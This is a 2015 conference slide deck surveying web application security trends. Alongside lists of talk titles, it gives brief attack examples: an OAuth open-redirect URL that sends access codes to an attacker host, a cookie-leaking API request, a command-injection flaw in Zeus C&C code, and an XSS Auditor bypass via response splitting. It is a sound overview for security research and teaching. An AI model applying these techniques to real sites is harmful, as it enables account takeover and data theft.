Web application security trends
Omar Ganiev
28/02/2015
Hi!
I’m Beched, and I love hacking an solving problems.Let’s observe overall trends and some recently published papers, vulnerabilities and techniques, connected with web application security.
Classification
Questions to classify the vulnerabilities:• Is the exploitation technique new or known?• Is the attack target new or known technology?• How large is a potential attack surface?
Sourcesof news
• Bug trackers, mailing lists
• https://blackhat.com/html/archives.html
• https://blog.whitehatsec.com/top-10-web-hacking-techniques-2013/
• https://blog.whitehatsec.com/top-10-web-hacking-techniques-of-2014/
• …
Community opinion
• 30.77% of respondents from rdot.org will go to dance a ballet, because web hacking is gonna become way too complex =)
Obvious remarks
• Growth of security awareness of developers makes their code more secure
• At the same time new products and technologies are often released without careful security audit
• Old software is often considered as safe and trusty but contains severe vulnerabilities
• Business logic bugs are alive
Obvious remarks
• Infosec is part of CS and IT, and it inherits global trends
• The global trend is a wide spread of various gadgets and mobile devices
• The global trend is making houses and vehicles smart
• The global trend is making web interfaces rich and self-contained in the browsers
Take a look• There’re loads of papers and presentations at BlackHat
archives. If we filter those, which are connected with web security, and range the topics, we get the following scoreboard of trends:
• client-side && mobile• clouds && big data && social networks• misc && classic• TLS && SSL• IoT && routers• PRNG && SSRF && etc• old soft
Client-side && Mobile
• Known technologies, new life• There’re loads of papers on client-side security• Loads of bug bounties are given for XSS or
something like that• There’re a lot of tricky techniques, and we can
see a long war between browser developers and XSS hunters
• Mobile browsers are also targeted. Some mobile OS interfaces are HTML5-based, which increases impact of XSS
Client-side && MobileDISSECTING CSRF ATTACKS & COUNTERMEASURES
JAVASCRIPT STATIC SECURITY ANALYSIS MADE EASY WITH JSPRIME
MILLION BROWSER BOTNET
PIXEL PERFECT TIMING ATTACKS WITH HTML5
ABUSING WEB APIS THROUGH SCRIPTED ANDROID APPLICATIONS
CLICKJACKING REVISITED: A PERCEPTUAL VIEW OF UI SECURITY
THE WEB IS VULNERABLE: XSS DEFENSE ON THE BATTLEFRONT
CALL TO ARMS: A TALE OF THE WEAKNESSES OF CURRENT CLIENT-SIDE XSS FILTERING
REFLECTED FILE DOWNLOAD - A NEW WEB ATTACK VECTOR
REVISITING XSS SANITIZATION
SAME ORIGIN METHOD EXECUTION (SOME) - EXPLOITING A CALLBACK FOR SAME ORIGIN POLICY BYPASS
SESSION IDENTIFIER ARE FOR NOW, PASSWORDS ARE FOREVER - XSS-BASED ABUSE OF BROWSER PASSWORD MANAGERS
TWO FACTOR FAILURE
THE INNER WORKINGS OF MOBILE CROSS-PLATFORM TECHNOLOGIES
JS SUICIDE: USING JAVASCRIPT SECURITY FEATURES TO KILL JS SECURITY
UI REDRESSING ATTACKS ON ANDROID DEVICES REVISITED
ULTIMATE DOM BASED XSS DETECTION SCANNER ON CLOUD
Client-side && Mobile
• UXSS, MXSS
• ChromeOS, FirefoxOS
• Browser extensions hacking
• Endless security features vs bypass war
• XSS Auditor, CSP, HttpOnly, SOP, CORS
• Funny things like RFD (reflected file download)
• OAuth bugs
Example
• Chrome XSS auditor breaks a lot of attacks, but in most cases it can be bypassed, or at least an attack can be modified
• The idea is that it looks for complete tag names or attributes from the page in the HTTP request packets
• There’re plenty of bypasses, take a look athttp://www.thespanner.co.uk/2015/02/10/xss-auditor-bypass/http://www.thespanner.co.uk/2015/02/19/another-xss-auditor-bypass/https://www.blackhat.com/docs/us-14/materials/us-14-Johns-Call-To-Arms-A-Tale-Of-The-Weaknesses-Of-Current-Client-Side-XSS-Filtering.pdf
Example• Other bypasses include CSRF tokens leakage, form target
forgery, etc
Example• Secure CMS and XSS Auditor can be spoiled with
plugins
• Look at this typographic plugin for Drupal:
var result = Typographus_Lite_UTF8.typo_text( $(this).text() ); $(this).after(result).remove();
• JQuery method after() is insecure. As a result, div contents become HTML-decoded, and all your reflected or stored <script> stuff becomes active
Example
• OAuth is often vulnerable to open redirect due to lack of redirect_uri validation
https://*.ru/oauth/authorize?client_id=4f81a884015911e2b24a6c626d99879c&response_type=code&redirect_uri=http://*.ru.incsecurity.ru/&state=&scope=...&action=login&csrf=69a1dc0caf28d791cb1998c8dc37a257
After authorization redirects to:http://*.ru.incsecurity.ru/site/login?service=*&state=&code=ba0ba85458d0db1c65792d52c8bef3c4407374b2
• Access token (code) value is enough for account takeover
Clouds && Big data && Social networks
• Fairly new technologies
• Cloud computing and machine learning are heavily used for different purposes
• As for infosec, this can be used both for attack and defense
• Social networks and big data providers can be exploited for deanonymization and fraud
• Machine learning can be used for building WAF
Clouds && Big data && Social networks
PREDICTING SUSCEPTIBILITY TO SOCIAL BOTS ON TWITTER USING ONLINE ACTIVITY AS DIGITAL FINGERPRINTS TO CREATE A BETTER SPEAR PHISHER WITH BIGDATA COMES BIG RESPONSIBILITY: PRACTICAL EXPLOITING OF MDX INJECTIONS BIG DATA FOR WEB APPLICATION SECURITY FLOATING CAR DATA FROM SMARTPHONES: WHAT GOOGLE AND WAZE KNOW ABOUT YOU AND HOW HACKERS CAN CONTROL TRAFFICPIVOTING IN AMAZON CLOUDSBRINGING A MACHETE TO THE AMAZONBABAR-IANS AT THE GATE: DATA PROTECTION AT MASSIVE SCALESECURE BECAUSE MATH: A DEEP-DIVE ON MACHINE LEARNING-BASED MONITORINGBLENDED WEB AND DATABASE ATTACKS ON REAL-TIME, IN-MEMORY PLATFORMSHADOOP SECURITY: SEVEN WAYS TO KILL AN ELEPHANTHOW TO LEAK A 100-MILLION-NODE SOCIAL GRAPH IN JUST ONE WEEK? - A REFLECTION ON OAUTH AND API DESIGN IN ONLINE SOCIAL NETWORKS
Example• Post-exploitation of distributed web applications is
often a bit tricky – you don’t exactly know which node will process your request
• Nodes can often be enumerated via HTTP response headers or cookies
• Sometimes some nodes are not updated and contain vulnerabilities
• This creates mind-blowing phantom vulnerabilities =)• Take a look at cool talk about Amazon EC2 post-
exploitation: https://www.blackhat.com/docs/us-14/materials/us-14-Riancho-Pivoting-In-Amazon-Clouds.pdf
Example• Data providers are often used for targeted
marketing. However, their data can sometimes be stolen and used for deanonymisation or fraud. This is documented API request:
https://*.ru/api/id?pid=PARTNER_SHORTNAME&url=http://incsecurity.ru/?adv_id=$UID
• $UID will be replaced with actual cookie value by the server and will be sent to attacker host
• Information about user can be obtained via JSONP hijacking, even if session id is checked.
Example• Request:https://*.ru/api/get/?uid=$UID&success_cb=_cb_s&fail_cb=_cb_e&st=1• Response contains information about gender, interests, etc. Part of
interests description file:…
{"id": "40010082","segment": "Fetish & Bondage","category": "Interests","section": "Interests","description": "“
}…
Misc & Classic
• There’re a lot of works which continue previous researches and bug reports
• They improve exploitation of classical vulnerabilities like SQL injection and testing/analysis methods
• The raise of penetration testing industry pushed up demand for .NET and J2EE applications hacking methods
Misc & Classic') UNION SELECT `THIS_TALK` AS ('NEW OPTIMIZATION AND OBFUSCATION
TECHNIQUES’)%00 INVISIBILITY PURGE – UNMASKING THE DORMANT EVENTS OF INVISIBLE
WEB CONTROLS – ADVANCED HACKING METHODS FOR ASP.NET, MONO AND RIA
CONTEMPORARY AUTOMATIC PROGRAM ANALYSISFINGERPRINTING WEB APPLICATION PLATFORMS BY VARIATIONS IN PNG
IMPLEMENTATIONSI KNOW YOUR FILTERING POLICY BETTER THAN YOU DO: EXTERNAL
ENUMERATION AND EXPLOITATION OF EMAIL AND WEB SECURITY SOLUTIONS
WHAT GOES AROUND COMES BACK AROUND - EXPLOITING FUNDAMENTAL WEAKNESSES IN BOTNET C&C PANELS!
SCALA SECURITY: EXAMINING THE PLAY AND LIFTWEB FRAMEWORKS
Example
• The paper about hacking C&C panels reminded me of the RCE vulnerability in Zeus C&C, which I published near 2010. I opened these links now:
http://ahack.ru/bugs/zeus-vulnerability-exploit.htm
https://github.com/Visgean/Zeus/
• Guess what I see there since 5 years? ;)
Example• The name of function has changed, but vulnerability is still there,
AFAICS...function fsarcCreate($archive, $files)...$cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';exec($cli, $e, $r);...foreach($_POST['files'] as $file)$list[] = $_CUR_PATH.'/'.$file;...if(!function_exists('fsarcCreate') || ($arcfile = fsarcCreate($arcfile, $list))
=== false)die('Failed to create archive, please check "system/fsarc.php" script.');
...
Example• This is a small example, probably there’re more critical
vulnerabilities in this popular botnet C&C. BTW, how do you find vulnerabilities in the source code?
• Paper on contemporary automatic program analysis mostly tells about grep =)
• Personally I use grep with lovely regular expressions:\w*(include|require)(_once)?[\s\(]+(?!\s*('[^']*'|"[^"]*"|
)[@\s\.]*(urlencode|rand|rawurlencode|basename|levenshtein|doubleval|sizeof|base64_encode|strlen|floor|crypt|strrpos|filter_input|abs|bin2hex|bindec|hash|intval|max|decbin|strpos|crc32|ord|md5|count|sha1|min|pathinfo|floatval|round|hexdec)\s*\()[^;]*\$.*
Example
Example
• 2014 has gone, and here comes 2015, but PHP and Apache are still broken
• Several UAF vulnerabilities in PHP fixed recently, still a lot of restriction bypasses and RCE vulnerabilities live deep there
• Apache has not yet learnt RFC
• Other popular miscellaneous words among hackers: NoSQL, SSJS, SCADA, SAP
TLS && SSL
• As old as the world
• There’re still a lot of misconfiguration issues with HTTPS
• Also there’re a lot of scary words like BEAST, CRIME, BREACH, HeartBleed, POODLE, SSLStrip and others
• Many configuration mistakes are result of trade-off between performance and security
TLS && SSL
SSL, GONE IN 30 SECONDS - A BREACH BEYOND CRIME
TLS 'SECRETS'
TRUNCATING TLS CONNECTIONS TO VIOLATE BELIEFS IN WEB APPLICATIONS
A PERFECT CRIME? ONLY TIME WILL TELL
THE BEAST WINS AGAIN: WHY TLS KEEPS FAILING TO PROTECT HTTP
BYPASSING HTTP STRICT TRANSPORT SECURITY
IoT && Routers• This is one of the most popular new IT trends
everyone heard about
• New means untested. Untested means vulnerable
• Seriously, the Internet of things is broken, and many yell about it
• People hack RF protocols of alarms, people find smart houses without doors via Shodan, etc, etc
IoT && Routers
EXPLOITING NETWORK SURVEILLANCE CAMERAS LIKE A HOLLYWOOD HACKER
HOME INVASION V2.0 - ATTACKING NETWORK-CONTROLLED HARDWARE
A SURVEY OF REMOTE AUTOMOTIVE ATTACK SURFACES
ABUSING THE INTERNET OF THINGS: BLACKOUTS, FREAKOUTS, AND STAKEOUTS
OWNING A BUILDING: EXPLOITING ACCESS CONTROL AND FACILITY MANAGEMENT SYSTEMS
Example
• Just look at this:
Example
• And this:
Example
• And this (admin;admin):
Example
• BTW, side note: why doesn’t XSS Auditor perform HTTP response splitting check?
• As you could see on the screenshot above, response splitting kills XSS Auditor, because we can inject header X-XSS-Protection: 0.
PRNG && SSRF && etc
• XXE, SSRF and randomness hacking were hot topics of 2012-2013
• They are popular today too, new applications and attack vectors are developed
PRNG && SSRF && etc
BLACK-BOX ASSESSMENT OF PSEUDORANDOM ALGORITHMS
XML OUT-OF-BAND DATA RETRIEVAL
THE NEW PAGE OF INJECTIONS BOOK: MEMCACHED INJECTIONS
ICSCORSAIR: HOW I WILL PWN YOUR ERP THROUGH 4-20 MA CURRENT LOOP
Example• Autodiscover interface in OWA reveals an internal
IP address of the mail server
• Ev.owa interface with cPfdDC parameter can be used to send some LDAP requests and connect to different hosts (“domain controllers”)
Microsoft.Exchange.Data.Directory.SuitabilityVerifier.CreateConnectionAndBind(String fqdn, Int32 portNumber, NetworkCredential credential)
• If there was bypass for anti-CSRF canary, you could possibly steal NTLM credentials
Example• vBulletin forum CMS allows to upload attachments
from remote URL (class_upload.php, class_vurl.php)
• First it checks the file size via HEAD request, then it downloads the file
• You can use HTTP multiplexor to exploit race condition and return code 200 and valid file size for the first request and 302 redirect for the second request
• Some configuration options and old versions of cURL allow file:// URL wrapper in Location header
Old soft• We’ve witnessed several critical vulnerabilities
in well-known and widely used software in 2014
• HeartBleed, GHOST, ShellShock, POODLE, gotofail, etc
• Probably it’s an important moment, when we stop trusting and begin reviewing all the fundamental old software that we use everywhere
Old soft
EPIDEMIOLOGY OF SOFTWARE VULNERABILITIES: A STUDY OF ATTACK SURFACE SPREAD
SSL VALIDATION CHECKING VS. GO(ING) TO FAIL
Example
• Although these famous vulnerabilities are not caused by web applications, they deeply affect them
• ShellShock and GHOST affect webapp<->OS interaction layer
• HeartBleed, goto fail, POODLE, affect mainly webapp<->encryption<->network interaction layer
Example
• This is another proof of why shouldn’t we consider any part of the software as trusted. Each component of the system can be broken
• BTW, newspapermen also started the era of nicknames for vulnerabilities
• I find this a bit ridiculous but funny =)
Summary
• The Internet is broken
• The WWW is broken
• Hackers gonna hack
• Web applications become smarter
• Hacking becomes smarter